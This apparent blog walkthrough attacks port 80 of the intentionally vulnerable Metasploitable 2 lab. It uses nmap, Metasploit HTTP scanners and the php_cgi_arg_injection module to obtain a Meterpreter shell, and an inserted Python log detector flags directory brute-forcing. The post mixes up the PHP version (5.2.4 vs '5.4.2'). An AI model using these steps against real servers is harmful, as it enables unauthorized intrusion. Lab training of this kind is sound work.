Metasploitable 2: Port 80

Miguel Sampaio da Veiga
Published in Hacker Toolbelt
Apr 29, 2019

Welcome back to part IV in the Metasploitable 2 series. In part I we configured our lab and scanned our target, in part II we hacked port 21, in part III we enumerated users with port 25, and now it’s time to check port 80.

Port 80 is the default port for HTTP services (web pages). In a previous scan we determined that port 80 is open. It’s now time to determine what is running behind that port.

First, do an nmap scan:

> db_nmap -sV 192.168.231.109 -p 80

It’s Apache running on Ubuntu. Let’s try to gather some more info with an auxiliary scanner:

> use auxiliary/scanner/http/http_version

> show options

> run

It’s Apache 2.2.8 with PHP 5.2.4. We can navigate to ‘http://192.168.231.109/phpinfo.php’ and confirm the information already gathered:

Let’s try other HTTP modules to obtain more information about our server:

‘dir_listing’ will determine if directory listing is enabled:

> use auxiliary/scanner/http/dir_listing

> show options

> run

No luck. ‘dir_scanner’ will check for interesting directories:

> use auxiliary/scanner/http/dir_scanner

> show options

> run

We got 6 directories. Going through their content might give us an edge to hack our target. Let’s try another module, ‘files_dir’:

> use auxiliary/scanner/http/files_dir

> show options

> run

Once again, these results might make a difference and we should take a look at them. Other modules of interest are ‘options’, ‘robots_txt’ and ‘verb_auth_bypass’:

> use auxiliary/scanner/http/verb_auth_bypass

> show options

> run

And many more modules that I urge you to try.
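Seen from the defender’s side, ‘dir_scanner’ and ‘files_dir’ work by requesting many candidate paths, so they leave a burst of 404 responses from a single client in the Apache access log. The Python detector below is an added example, not part of the original article; it assumes the common/combined log format, the window and threshold values are illustrative, and the log lines and addresses are constructed sample data.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Start of an Apache common/combined log line: client, time, request path, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"[A-Z]+ (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def parse(line):
    """Return (ip, time, path without query string, status), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"].split("?", 1)[0], int(m["status"])

def find_path_bruteforce(lines, window=timedelta(seconds=60), threshold=5):
    """Flag clients with >= threshold distinct 404 paths inside one sliding window
    (defaults are illustrative). Returns {ip: sorted paths of the first burst}."""
    misses = defaultdict(list)                      # ip -> [(time, path), ...]
    for ip, ts, path, status in filter(None, map(parse, lines)):
        if status == 404:
            misses[ip].append((ts, path))
    flagged = {}
    for ip, events in misses.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1                          # drop events older than the window
            paths = {p for _, p in events[start:end + 1]}
            if len(paths) >= threshold:
                flagged[ip] = sorted(paths)
                break
    return flagged

def _line(ip, sec, path, status):
    # Builds one constructed log line (sample data, not from a real server).
    return (f'{ip} - - [29/Apr/2019:10:00:{sec:02d} +0000] '
            f'"GET {path} HTTP/1.1" {status} 512 "-" "-"')

# Constructed sample: one client walking a wordlist, one ordinary visitor.
SAMPLE = [_line("192.0.2.10", i, f"/{name}/", 404)
          for i, name in enumerate(["admin", "backup", "cgi", "old", "private", "tmp"])]
SAMPLE += [_line("192.0.2.10", 7, "/doc/", 200),
           _line("198.51.100.7", 8, "/index.php", 200),
           _line("198.51.100.7", 9, "/favicon.ico", 404),
           "malformed line"]

if __name__ == "__main__": print(find_path_bruteforce(SAMPLE))
```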

Let’s make use of the information we gathered.

Let’s search Exploit-DB for Apache with the version of PHP:

$ searchsploit apache | grep 5.4.2

CGI Remote Code Execution found. Let’s exploit it:

> use exploit/multi/http/php_cgi_arg_injection

> set lhost

> run

We got a Meterpreter shell!!

Conclusion

Port 80 is as good a source of information and exploits as any other port. We’ll come back to this port for the web apps installed. In this article we got information about the services running and found an exploit that gave us a shell.
